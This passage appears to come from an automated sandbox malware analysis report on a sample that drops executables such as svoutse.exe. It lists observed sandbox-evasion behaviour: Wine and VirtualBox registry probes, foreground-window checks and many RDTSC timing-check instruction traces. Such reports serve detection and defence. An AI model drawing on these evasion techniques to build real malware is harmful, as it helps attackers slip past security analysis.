Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D6F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		21_2_00D6F98E
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DE1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		21_2_00DE1C41

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_21-96751

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\pud8g3zixE.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135A44 second address: 1135A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164C54721h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135A5B second address: 1135A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1134C9C second address: 1134CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54726h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1134CBE second address: 1134CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1134CC2 second address: 1134CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1134E07 second address: 1134E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1134E0C second address: 1134E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11350FF second address: 1135103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135103 second address: 113511A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135255 second address: 1135259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135259 second address: 1135265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD164C54716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1135265 second address: 11352A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164D1C75Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FD164D1C75Fh 0x0000000f popad 0x00000010 jmp 00007FD164D1C769h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137B40 second address: 1137B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137B53 second address: 1137B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD164D1C75Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137B7E second address: 1137B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD164C54716h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137D1E second address: 1137D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C768h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137D3A second address: 1137D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137D40 second address: 1137DB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FD164D1C758h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jmp 00007FD164D1C75Fh 0x0000002a call 00007FD164D1C759h 0x0000002f push ecx 0x00000030 jmp 00007FD164D1C765h 0x00000035 pop ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edi 0x00000039 push edx 0x0000003a pop edx 0x0000003b pop edi 0x0000003c pop eax 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 je 00007FD164D1C760h 0x00000047 push eax 0x00000048 push edx 0x00000049 push edi 0x0000004a pop edi 0x0000004b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137DB2 second address: 1137E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d jg 00007FD164C54718h 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnl 00007FD164C5472Ch 0x0000001e pop eax 0x0000001f add dword ptr [ebp+122D33CFh], edi 0x00000025 push 00000003h 0x00000027 movzx esi, ax 0x0000002a push 00000000h 0x0000002c js 00007FD164C5471Ch 0x00000032 push 00000003h 0x00000034 clc 0x00000035 call 00007FD164C54719h 0x0000003a push eax 0x0000003b push edx 0x0000003c push edx 0x0000003d jc 00007FD164C54716h 0x00000043 pop edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137E18 second address: 1137E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD164D1C761h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jo 00007FD164D1C760h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137E51 second address: 1137E65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007FD164C54716h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137E65 second address: 1137E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137E6B second address: 1137EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jnc 00007FD164C54722h 0x00000012 pop eax 0x00000013 push ebx 0x00000014 adc di, A35Fh 0x00000019 pop edi 0x0000001a lea ebx, dword ptr [ebp+1245CA1Eh] 0x00000020 call 00007FD164C54723h 0x00000025 ja 00007FD164C5471Ch 0x0000002b sub edx, dword ptr [ebp+122D1BA3h] 0x00000031 pop ecx 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 push eax 0x00000035 push ebx 0x00000036 pop ebx 0x00000037 pop eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1137EC1 second address: 1137EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1149FBF second address: 1149FDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1149FDF second address: 1149FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164D1C765h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1149FF8 second address: 1149FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111BD6C second address: 111BD8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD164D1C767h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111BD8D second address: 111BDA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD164C54722h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111BDA7 second address: 111BDD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C765h 0x00000007 jg 00007FD164D1C756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FD164D1C75Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115881B second address: 1158832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FD164C54720h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115898A second address: 11589A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD164D1C761h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11589A4 second address: 11589A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11589A9 second address: 11589BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C75Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1158B61 second address: 1158B67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1158EA7 second address: 1158EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FD164D1C756h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007FD164D1C76Ch 0x00000012 jnp 00007FD164D1C75Ah 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11591A3 second address: 11591A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115958B second address: 115959F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164D1C75Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11596E6 second address: 11596F0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11596F0 second address: 1159700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164D1C75Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1159700 second address: 115971E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD164C54725h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115971E second address: 1159726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1159726 second address: 115972A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11598A3 second address: 11598A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11598A8 second address: 11598B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jl 00007FD164C54716h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11598B9 second address: 11598C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD164D1C756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11598C3 second address: 11598E3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FD164C5471Eh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1159EC2 second address: 1159EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C765h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115A006 second address: 115A00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 115A14E second address: 115A15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11187CD second address: 11187D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11187D1 second address: 11187D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11187D5 second address: 11187DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11619C0 second address: 11619CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD164D1C756h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111F495 second address: 111F4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD164C54724h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111F4AF second address: 111F4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111F4B5 second address: 111F4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 111F4B9 second address: 111F4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FD164D1C76Ch 0x0000000c jmp 00007FD164D1C766h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1166D2D second address: 1166D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1166D31 second address: 1166D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD164D1C762h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FD164D1C756h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1166EBB second address: 1166ED1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FD164C54716h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1166ED1 second address: 1166ED7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 11674FB second address: 1167510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD164C54720h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1167510 second address: 116753E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C768h 0x00000007 pushad 0x00000008 jnc 00007FD164D1C756h 0x0000000e jmp 00007FD164D1C75Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1167691 second address: 1167696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 1167696 second address: 116769C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116769C second address: 11676AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116AC50 second address: 116AC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116AC54 second address: 116AC5E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD164C54716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116AC5E second address: 116AC65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116AC65 second address: 116AC7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FD164C5471Eh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116AFFF second address: 116B004 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 116B004 second address: 116B00A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
